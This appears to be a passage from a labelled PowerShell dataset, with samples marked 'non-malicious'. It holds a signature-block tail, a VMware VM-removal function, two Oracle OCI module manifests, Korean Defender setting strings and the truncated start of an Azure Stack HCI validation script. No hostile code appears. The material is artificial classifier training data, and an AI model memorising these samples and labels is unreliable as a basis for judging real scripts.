CWCGSAFlAwQCAQUAoIGsMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG */ /* AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3DQEJBDEiBCCQnjI0YLQs */ /* cjadb3fvGITMiu0BADHQphWFRU5Ex915IzBABgorBgEEAYI3AgEMMTIwMKAWgBQA */ /* RABlAGwAbAAsACAASQBuAGMALqEWgBRodHRwOi8vd3d3LmRlbGwuY29tIDANBgkq */ /* hkiG9w0BAQEFAASCAYB2YIMn2iJOgpdB2aOejlesEEoJBwiCd1AlM52qzg+YZTDz */ /* NYyHDv4PetsoLcrgE+XtU1/mrejSvRY0EYni1z0sx0vy2oZpn4nJUBDNJZIjxvps */ /* KURGd/EzbqzudTQ3BhYaqW3MMHfCaEhadK6DI7eq1ZGllzHejTEcyL30srIvL2Z5 */ /* K7L8mI6ZWrwruIQvzgEnJ7rhLboMIHH5uoX9EOXPDVWR7O6scRKjH2FPk7niyeTw */ /* DeffpiqJhukE9dV1Po4F8TRdZs4NeZfvU5lga8iCjcNlIVRtzNhcMfXT8PfSxyGY */ /* DVIgg2WfOunnazdVD3AaBtewkhU1lYWJ/cGRGY546JLOtcoqMiYDvHQRGTFR4k17 */ /* HVv3mE/iwMoeNfB0ShDn+qsiYSk7AzIMhmzmJEm48WduIiQ1uyL/VprZWXLdEyah */ /* eebkmbev+8Xvk1vl8LtLqLCI9+sQ4g4jM+bueTsgdtIu5Ujo6DaI6cVY/YyCgHFz */ /* V2xaK7s3ebKsVV3b+L+hghc/MIIXOwYKKwYBBAGCNwMDATGCFyswghcnBgkqhkiG */ /* 9w0BBwKgghcYMIIXFAIBAzEPMA0GCWCGSAFlAwQCAQUAMHcGCyqGSIb3DQEJEAEE */ /* oGgEZjBkAgEBBglghkgBhv1sBwEwMTANBglghkgBZQMEAgEFAAQgYts0/BT0cqdp */ /* tUmwcVmXMQOifZNiQAD2IOuz6AUzTHgCEEGFiN7JGk2cUZNVOJUPCXsYDzIwMjQw */ /* OTIwMDcwMDE4WqCCEwkwggbCMIIEqqADAgECAhAFRK/zlJ0IOaa/2z9f5WEWMA0G */ /* CSqGSIb3DQEBCwUAMGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg */ /* SW5jLjE7MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1 */ /* NiBUaW1lU3RhbXBpbmcgQ0EwHhcNMjMwNzE0MDAwMDAwWhcNMzQxMDEzMjM1OTU5 */ /* WjBIMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xIDAeBgNV */ /* BAMTF0RpZ2lDZXJ0IFRpbWVzdGFtcCAyMDIzMIICIjANBgkqhkiG9w0BAQEFAAOC */ /* Ag8AMIICCgKCAgEAo1NFhx2DjlusPlSzI+DPn9fl0uddoQ4J3C9Io5d6OyqcZ9xi */ /* FVjBqZMRp82qsmrdECmKHmJjadNYnDVxvzqX65RQjxwg6seaOy+WZuNp52n+W8PW */ /* KyAcwZeUtKVQgfLPywemMGjKg0La/H8JJJSkghraarrYO8pd3hkYhftF6g1hbJ3+ */ /* cV7EBpo88MUueQ8bZlLjyNY+X9pD04T10Mf2SC1eRXWWdf7dEKEbg8G45lKVtUfX */ /* eCk5a+B4WZfjRCtK1ZXO7wgX6oJkTf8j48qG7rSkIWRw69XloNpjsy7pBe6q9iT1 */ /* HbybHLK3X9/w7nZ9MZllR1WdSiQvrCuXvp/k/XtzPjLuUjT71Lvr1KAsNJvj3m5k */ /* GQc3AZEPHLVRzapMZoOIaGK7vEEbeBlt5NkP4FhB+9ixLOFRr7StFQYU6mIIE9Np */ /* HnxkTZ0P387RXoyqq1AVybPKvNfEO2hEo6U7Qv1zfe7dCv95NBB+plwKWEwAPoVp */ /* dceDZNZ1zY8SdlalJPrXxGshuugfNJgvOuprAbD3+yqG7HtSOKmYCaFxsmxxrz64 */ /* b5bV4RAT/mFHCoz+8LbH1cfebCTwv0KCyqBxPZySkwS0aXAnDU+3tTbRyV8IpHCj */ /* 7ArxES5k4MsiK8rxKBMhSVF+BmbTO77665E42FEHypS34lCh8zrTioPLQHsCAwEA */ /* AaOCAYswggGHMA4GA1UdDwEB/wQEAwIHgDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB */ /* /wQMMAoGCCsGAQUFBwMIMCAGA1UdIAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwH */ /* ATAfBgNVHSMEGDAWgBS6FtltTYUvcyl2mi91jGogj57IbzAdBgNVHQ4EFgQUpbbv */ /* E+fvzdBkodVWqWUxo97V40kwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDovL2NybDMu */ /* ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVT */ /* dGFtcGluZ0NBLmNybDCBkAYIKwYBBQUHAQEEgYMwgYAwJAYIKwYBBQUHMAGGGGh0 */ /* dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBYBggrBgEFBQcwAoZMaHR0cDovL2NhY2Vy */ /* dHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRp */ /* bWVTdGFtcGluZ0NBLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAgRrW3qCptZgXvHCN */ /* T4o8aJzYJf/LLOTN6l0ikuyMIgKpuM+AqNnn48XtJoKKcS8Y3U623mzX4WCcK+3t */ /* PUiOuGu6fF29wmE3aEl3o+uQqhLXJ4Xzjh6S2sJAOJ9dyKAuJXglnSoFeoQpmLZX */ /* eY/bJlYrsPOnvTcM2Jh2T1a5UsK2nTipgedtQVyMadG5K8TGe8+c+njikxp2oml1 */ /* 01DkRBK+IA2eqUTQ+OVJdwhaIcW0z5iVGlS6ubzBaRm6zxbygzc0brBBJt3eWpdP */ /* M43UjXd9dUWhpVgmagNF3tlQtVCMr1a9TMXhRsUo063nQwBw3syYnhmJA+rUkTfv */ /* TVLzyWAhxFZH7doRS4wyw4jmWOK22z75X7BC1o/jF5HRqsBV44a/rCcsQdCaM0qo */ /* NtS5cpZ+l3k4SF/Kwtw9Mt911jZnWon49qfH5U81PAC9vpwqbHkB3NpE5jreODsH */ /* XjlY9HxzMVWggBHLFAx+rrz+pOt5Zapo1iLKO+uagjVXKBbLafIymrLS2Dq4sUaG */ /* a7oX/cR3bBVsrquvczroSUa31X/MtjjA2Owc9bahuEMs305MfR5ocMB3CtQC4Fxg */ /* uyj/OOVSWtasFyIjTvTs0xf7UGv/B3cfcZdEQcm4RtNsMnxYL2dHZeUbc7aZ+Wss */ /* BkbvQR7w8F/g29mtkIBEr4AQQYowggauMIIElqADAgECAhAHNje3JFR82Ees/Shm */ /* Kl5bMA0GCSqGSIb3DQEBCwUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdp */ /* Q2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERp */ /* Z2lDZXJ0IFRydXN0ZWQgUm9vdCBHNDAeFw0yMjAzMjMwMDAwMDBaFw0zNzAzMjIy */ /* MzU5NTlaMGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7 */ /* MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1l */ /* U3RhbXBpbmcgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDGhjUG */ /* SbPBPXJJUVXHJQPE8pE3qZdRodbSg9GeTKJtoLDMg/la9hGhRBVCX6SI82j6ffOc */ /* iQt/nR+eDzMfUBMLJnOWbfhXqAJ9/UO0hNoR8XOxs+4rgISKIhjf69o9xBd/qxkr */ /* PkLcZ47qUT3w1lbU5ygt69OxtXXnHwZljZQp09nsad/ZkIdGAHvbREGJ3HxqV3rw */ /* N3mfXazL6IRktFLydkf3YYMZ3V+0VAshaG43IbtArF+y3kp9zvU5EmfvDqVjbOSm */ /* xR3NNg1c1eYbqMFkdECnwHLFuk4fsbVYTXn+149zk6wsOeKlSNbwsDETqVcplicu */ /* 9Yemj052FVUmcJgmf6AaRyBD40NjgHt1biclkJg6OBGz9vae5jtb7IHeIhTZgirH */ /* kr+g3uM+onP65x9abJTyUpURK1h0QCirc0PO30qhHGs4xSnzyqqWc0Jon7ZGs506 */ /* o9UD4L/wojzKQtwYSH8UNM/STKvvmz3+DrhkKvp1KCRB7UK/BZxmSVJQ9FHzNklN */ /* iyDSLFc1eSuo80VgvCONWPfcYd6T/jnA+bIwpUzX6ZhKWD7TA4j+s4/TXkt2ElGT */ /* yYwMO1uKIqjBJgj5FBASA31fI7tk42PgpuE+9sJ0sj8eCXbsq11GdeJgo1gJASgA */ /* DoRU7s7pXcheMBK9Rp6103a50g5rmQzSM7TNsQIDAQABo4IBXTCCAVkwEgYDVR0T */ /* AQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUuhbZbU2FL3MpdpovdYxqII+eyG8wHwYD */ /* VR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMG */ /* A1UdJQQMMAoGCCsGAQUFBwMIMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYY */ /* aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2Fj */ /* ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV */ /* HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRU */ /* cnVzdGVkUm9vdEc0LmNybDAgBgNVHSAEGTAXMAgGBmeBDAEEAjALBglghkgBhv1s */ /* BwEwDQYJKoZIhvcNAQELBQADggIBAH1ZjsCTtm+YqUQiAX5m1tghQuGwGC4QTRPP */ /* MFPOvxj7x1Bd4ksp+3CKDaopafxpwc8dB+k+YMjYC+VcW9dth/qEICU0MWfNthKW */ /* b8RQTGIdDAiCqBa9qVbPFXONASIlzpVpP0d3+3J0FNf/q0+KLHqrhc1DX+1gtqpP */ /* kWaeLJ7giqzl/Yy8ZCaHbJK9nXzQcAp876i8dU+6WvepELJd6f8oVInw1YpxdmXa */ /* zPByoyP6wCeCRK6ZJxurJB4mwbfeKuv2nrF5mYGjVoarCkXJ38SNoOeY+/umnXKv */ /* xMfBwWpx2cYTgAnEtp/Nh4cku0+jSbl3ZpHxcpzpSwJSpzd+k1OsOx0ISQ+UzTl6 */ /* 3f8lY5knLD0/a6fxZsNBzU+2QJshIUDQtxMkzdwdeDrknq3lNHGS1yZr5Dhzq6YB */ /* T70/O3itTK37xJV77QpfMzmHQXh6OOmc4d0j/R0o08f56PGYX/sr2H7yRp11LB4n */ /* LCbbbxV7HhmLNriT1ObyF5lZynDwN7+YAN8gFk8n+2BnFqFmut1VwDophrCYoCvt */ /* lUG3OtUVmDG0YgkPCr2B2RP+v6TR81fZvAT6gt4y3wSJ8ADNXcL50CN/AAvkdgIm */ /* 2fBldkKmKYcJRyvmfxqkhQ/8mJb2VVQrH4D6wPIOK+XW+6kvRBVK5xMOHds3OBqh */ /* K/bt1nz8MIIFjTCCBHWgAwIBAgIQDpsYjvnQLefv21DiCEAYWjANBgkqhkiG9w0B */ /* AQwFADBlMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYD */ /* VQQLExB3d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVk */ /* IElEIFJvb3QgQ0EwHhcNMjIwODAxMDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQsw */ /* CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu */ /* ZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQw */ /* ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz */ /* 7MKnJS7JIT3yithZwuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS */ /* 5F/WBTxSD1Ifxp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7 */ /* bXHiLQwb7iDVySAdYyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfI */ /* SKhmV1efVFiODCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jH */ /* trHEtWoYOAMQjdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14 */ /* Ztk6MUSaM0C/CNdaSaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2 */ /* h4mXaXpI8OCiEhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt */ /* 6zPZxd9LBADMfRyVw4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPR */ /* iQfhvbfmQ6QYuKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ER */ /* ElvlEFDrMcXKchYiCd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4K */ /* Jpn15GkvmB0t9dmpsh3lGwIDAQABo4IBOjCCATYwDwYDVR0TAQH/BAUwAwEB/zAd */ /* BgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08wHwYDVR0jBBgwFoAUReuir/SS */ /* y4IxLVGLp6chnfNtyA8wDgYDVR0PAQH/BAQDAgGGMHkGCCsGAQUFBwEBBG0wazAk */ /* BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEMGCCsGAQUFBzAC */ /* hjdodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURS */ /* b290Q0EuY3J0MEUGA1UdHwQ+MDwwOqA4oDaGNGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0 */ /* LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwEQYDVR0gBAowCDAGBgRV */ /* HSAAMA0GCSqGSIb3DQEBDAUAA4IBAQBwoL9DXFXnOF+go3QbPbYW1/e/Vwe9mqyh */ /* hyzshV6pGrsi+IcaaVQi7aSId229GhT0E0p6Ly23OO/0/4C5+KH38nLeJLxSA8hO */ /* 0Cre+i1Wz/n096wwepqLsl7Uz9FDRJtDIeuWcqFItJnLnU+nBgMTdydE1Od/6Fmo */ /* 8L8vC6bp8jQ87PcDx4eo0kxAGTVGamlUsLihVo7spNU96LHc/RzY9HdaXFSMb++h */ /* UD38dglohJ9vytsgjTVgHAIDyyCwrFigDkBjxZgiwbJZ9VVrzyerbHbObyMt9H5x */ /* aiNrIv8SuFQtJ37YOtnwtoeW/VvRXKwYw02fc7cBqZ9Xql4o4rmUMYIDdjCCA3IC */ /* AQEwdzBjMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5 */ /* BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0 */ /* YW1waW5nIENBAhAFRK/zlJ0IOaa/2z9f5WEWMA0GCWCGSAFlAwQCAQUAoIHRMBoG */ /* CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAcBgkqhkiG9w0BCQUxDxcNMjQwOTIw */ /* MDcwMDE4WjArBgsqhkiG9w0BCRACDDEcMBowGDAWBBRm8CsywsLJD4JdzqqKycZP */ /* GZzPQDAvBgkqhkiG9w0BCQQxIgQga3+yzmuX/Z1exN4eP2dUo27AOyU0V1MkS2Nb */ /* EsucifMwNwYLKoZIhvcNAQkQAi8xKDAmMCQwIgQg0vbkbe10IszR1EBXaEE2b4KK */ /* 2lWarjMWr00amtQMeCgwDQYJKoZIhvcNAQEBBQAEggIAoz7Vdm/SEtPbQE+l9hcM */ /* 5i3tffrJQ3tdHsUarwfSAcK7c6z7VLX+XjhK49Gb/sbXMj5Lxn1GosPq+DqO7skR */ /* l5YelRlq7sWJgzmgTIGTG71JQ48qOlQdpwBw18korfamA9UH3xyS7HaV3+fxmXhK */ /* QVw05lqD0S4l6gcEe39Jmb2Py0CMiQqqVVhD5CmAbbx9bOm0Hs6BCbxs5AVF02SP */ /* u6XbnEDfO2TUcC03FTK8rlD6i/stHQx9DVqzKprPuKs6x0/rRDF9PbJo09MDOCBN */ /* rv0rN6DhtGw10ytJFhj7ZFTOu9OOCfHZrZI0EQVwC0m3ScxzSWS6ZZ/Z+5mCpOzl */ /* hkucHWT8cyM47ikCtVQRwHNKjnjFsSpfHe1bRKG4MCIWviHmM64JdjwXb8FCAxAy */ /* yRqanmfdrH6NJELQ0/b3rNJx3XYr9wYrx6txQ/FYf8JVf3GpNG9UnCjX1h3aThFC */ /* QoR19u1H6t1HkN+BeIKnaGKP8IWXK5jQjTnlnJK0N4p0zoAlYFI7Eao5PleSQyGr */ /* UWpSOdSSoVviuxJf/wt1B1mudR8PsbEiTe+m7+GoPI+rLLZOuOFZEwLEewkpCv1p */ /* T4gmSmUzbL07HHZChbZBl7xbj9W0xFbC0pbqu+ptVsQS4PAfn/qUd6S0gzOZCqJ1 */ /* CUfDI8JYt/TEK2bhKVL+kRs= */ /* SIG # End signature block */
combined_dataset/train/non-malicious/2450.ps1
2450.ps1
function Remove-OnlineVM { [CmdletBinding(SupportsShouldProcess)] param ( [Parameter(Mandatory, ValueFromPipeline)] [ValidateNotNullOrEmpty()] [VMware.VimAutomation.ViCore.Impl.V1.Inventory.VirtualMachineImpl[]]$VM ) process { foreach ($v in $VM) { $vmName = $v.Name if ($PSCmdlet.ShouldProcess($vmName, 'Remove VM')) { if ((vmware.vimautomation.core\Get-VM -Name $vmName).PowerState -eq 'PoweredOn') { Write-Verbose -Message "[$vmName)] is online. Shutting down now." $v | vmware.vimautomation.core\Stop-VM -Confirm:$false } $v | vmware.vimautomation.core\Remove-VM -Confirm:$false } } } }
combined_dataset/train/non-malicious/sample_32_88.ps1
sample_32_88.ps1
# # Module manifest for module 'OCI.PSModules.Audit' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Audit.dll' # Version number of this module. ModuleVersion = '77.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '159ba3cf-8d7b-460e-bb56-36417d6f4316' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Audit Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '77.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Audit.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIAuditConfiguration', 'Get-OCIAuditEventsList', 'Update-OCIAuditConfiguration' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Audit' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_15_86.ps1
sample_15_86.ps1
# # Module manifest for module 'OCI.PSModules.Visualbuilder' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Visualbuilder.dll' # Version number of this module. ModuleVersion = '77.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '30071ced-fbc1-4b5d-9ea5-b0fb2ecea5bc' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Visualbuilder Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '77.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Visualbuilder.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIVisualbuilderVbInstance', 'Get-OCIVisualbuilderVbInstancesList', 'Get-OCIVisualbuilderWorkRequest', 'Get-OCIVisualbuilderWorkRequestErrorsList', 'Get-OCIVisualbuilderWorkRequestLogsList', 'Get-OCIVisualbuilderWorkRequestsList', 'Invoke-OCIVisualbuilderRequestSummarizedApplications', 'Move-OCIVisualbuilderVbInstanceCompartment', 'New-OCIVisualbuilderVbInstance', 'Remove-OCIVisualbuilderVbInstance', 'Start-OCIVisualbuilderVbInstance', 'Stop-OCIVisualbuilderVbInstance', 'Update-OCIVisualbuilderVbInstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Visualbuilder' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_27_18.ps1
sample_27_18.ps1
)이 설정은 네트워크 보호에 대한 DNS TCP 구문 분석을 비활성화합니다.%이 설정은 네트워크 보호에 대한 SSH 구문 분석을 비활성화합니다.i관리자가 특정 채널(링)에서 Microsoft Defender 플랫폼 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.베타미리 보기준비됨넓은지연됨h관리자가 특정 채널(링)에서 Microsoft Defender 엔진 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.n관리자가 특정 채널(링)에서 Microsoft Defender 보안 인텔리전스 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.A관리자가 엔진, 플랫폼 및 보안 인텔리전스 업데이트에 대한 점진적 릴리스 프로세스를 옵트아웃할 수 있도록 허용합니다.l이 설정은 RS3의 Windows 하위에서 네트워크 보호를 차단 또는 감사 모드로 구성할 수 있는지 여부를 제어합니다. false이면 EnableNetworkProtection 값이 무시됩니다.ˆ이 설정은 네트워크 보호가 Windows Server에서 데이터그램 처리를 사용하도록 허용할지 여부를 제어합니다. false이면 DisableDatagramProcessing 값이 무시되고 데이터그램 검사를 사용하지 않도록 기본값이 설정됩니다.p이 설정을 사용하면 차단 및 감사에 대한 EnableNetworkProtection 값을 존중하며 검사 모드에서는 아무 작업도 수행하지 않는 네트워크 보호용 DNS 싱크케일 기능을 사용할 수 있습니다.'이 설정은 네트워크 보호에 대한 인바운드 연결 필터링을 비활성화합니다.%이 설정은 네트워크 보호에 대한 RDP 구문 분석을 비활성화합니다.
combined_dataset/train/non-malicious/sample_51_61.ps1
sample_51_61.ps1
<############################################################# # # # Copyright (C) Microsoft Corporation. All rights reserved. # # # #############################################################> Import-Module $PSScriptRoot\AzStackHci.Observability.Helpers.psm1 -Force -DisableNameChecking -Global Import-Module $PSScriptRoot\..\AzStackHci.EnvironmentChecker.Utilities.psm1 -Force -DisableNameChecking -Global Import-Module $PSScriptRoot\..\AzStackHci.EnvironmentChecker.Reporting.psm1 -Force -DisableNameChecking -Global Import-LocalizedData -BindingVariable lvsTxt -FileName AzStackHci.Observability.Strings.psd1 function Invoke-AzStackHciObservabilityValidation { <# .SYNOPSIS Perform AzStackHci Observability Validation .DESCRIPTION Perform AzStackHci Observability Validation .EXAMPLE PS C:\> Invoke-AzStackHciObservabilityValidation Perform all Observability validations against localhost. .EXAMPLE PS C:\> $Credential = Get-Credential -Message "Credential for $RemoteSystem" PS C:\> $RemoteSystemSession = New-PSSession -Computer 10.0.0.4,10.0.0.5 -Credential $Credential PS C:\> Invoke-AzStackHciObservabilityValidation -PsSession $RemoteSystemSession Perform all Observability validations pre-existing remote PS sessions. .EXAMPLE PS C:\> Invoke-AzStackHciObservabilityValidation -PsSession $RemoteSystemSession -SkipLogCollectionValidation Perform all Observability validations against localhost except LogCollection tests. .PARAMETER PsSession Specify the PsSession(s) used to validation from. .PARAMETER OperationType Specify the Operation Type to target for connectivity validation. e.g. Deployment, Update, etc .PARAMETER PassThru Return PSObject result. .PARAMETER SkipLogCollectionValidation Skip LogCollection test. .PARAMETER OutputPath Directory path for log and report output. .PARAMETER CleanReport Remove all previous progress and create a clean report. .INPUTS Inputs (if any) .OUTPUTS Output (if any) #> [CmdletBinding()] param ( [Parameter(Mandatory = $true, HelpMessage = "Specify the PsSession(s) used to validation from.")] [System.Management.Automation.Runspaces.PSSession[]] $PsSession, [Parameter(Mandatory = $false, HelpMessage = "Specify the Operation Type to target for connectivity validation. e.g. Deployment, Update, 